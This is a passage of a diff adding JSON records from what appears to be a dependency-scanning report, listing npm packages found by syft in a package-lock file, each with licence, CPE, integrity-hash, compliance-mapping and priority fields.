+ }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3b9efee290bbc139", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: camelcase-css 2.0.1", + "title": "camelcase-css 2.0.1", + "description": "Package discovered: camelcase-css 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b224930ed183bceb", + "name": "camelcase-css", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:camelcase-css:camelcase-css:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:camelcase-css:camelcase_css:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:camelcase_css:camelcase-css:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:camelcase_css:camelcase_css:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:camelcase:camelcase-css:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:camelcase:camelcase_css:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/camelcase-css@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz", + "integrity": "sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "54ace4d8b29c3fad", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: caniuse-lite 1.0.30001791", + "title": "caniuse-lite 1.0.30001791", + "description": "Package discovered: caniuse-lite 1.0.30001791", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "574728aff770dffd", + "name": "caniuse-lite", + "version": "1.0.30001791", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "CC-BY-4.0", + "spdxExpression": "CC-BY-4.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:caniuse-lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:caniuse-lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:caniuse_lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:caniuse_lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:caniuse:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:caniuse:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/caniuse-lite@1.0.30001791", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz", + "integrity": "sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d2ccf1883f8178ec", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: chokidar 3.6.0", + "title": "chokidar 3.6.0", + "description": "Package discovered: chokidar 3.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e6e064efe5c17d2c", + "name": "chokidar", + "version": "3.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:chokidar:chokidar:3.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/chokidar@3.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz", + "integrity": "sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==", + "dependencies": { + "anymatch": "~3.1.2", + "braces": "~3.0.2", + "glob-parent": "~5.1.2", + "is-binary-path": "~2.1.0", + "is-glob": "~4.0.1", + "normalize-path": "~3.0.0", + "readdirp": "~3.6.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "265715c369a6ec46", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: client-only 0.0.1", + "title": "client-only 0.0.1", + "description": "Package discovered: client-only 0.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e7be86c370ee2217", + "name": "client-only", + "version": "0.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:client-only:client-only:0.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:client-only:client_only:0.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:client_only:client-only:0.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:client_only:client_only:0.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:client:client-only:0.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:client:client_only:0.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/client-only@0.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz", + "integrity": "sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c077917c166ed35e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cliui 6.0.0", + "title": "cliui 6.0.0", + "description": "Package discovered: cliui 6.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0b1fbe7259e117a1", + "name": "cliui", + "version": "6.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cliui:cliui:6.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/cliui@6.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz", + "integrity": "sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ==", + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.0", + "wrap-ansi": "^6.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b756cde7127582a3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cliui 8.0.1", + "title": "cliui 8.0.1", + "description": "Package discovered: cliui 8.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6699f516cd09331f", + "name": "cliui", + "version": "8.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cliui:cliui:8.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/cliui@8.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", + "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.1", + "wrap-ansi": "^7.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6102e65c9c7e3be7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: clone 2.1.2", + "title": "clone 2.1.2", + "description": "Package discovered: clone 2.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "924490c8cb0d8bef", + "name": "clone", + "version": "2.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:clone:clone:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/clone@2.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/clone/-/clone-2.1.2.tgz", + "integrity": "sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "de7fc275efead359", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: clsx 2.1.1", + "title": "clsx 2.1.1", + "description": "Package discovered: clsx 2.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1cdd74d474651cd1", + "name": "clsx", + "version": "2.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:clsx:clsx:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/clsx@2.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz", + "integrity": "sha512-eYm0QWBtUrBWZWG0d386OGAw16Z995PiOVo2B7bjWSbHedGl5e0ZWaq65kOGgUSNesEIDkB9ISbTg/JK9dhCZA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "03115b0621f3a47e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: cluster-key-slot 1.1.2", + "title": "cluster-key-slot 1.1.2", + "description": "Package discovered: cluster-key-slot 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "635dabdd9cdc8fd8", + "name": "cluster-key-slot", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:cluster-key-slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster-key-slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster_key_slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster_key_slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster-key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster-key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster_key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster_key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:cluster:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + 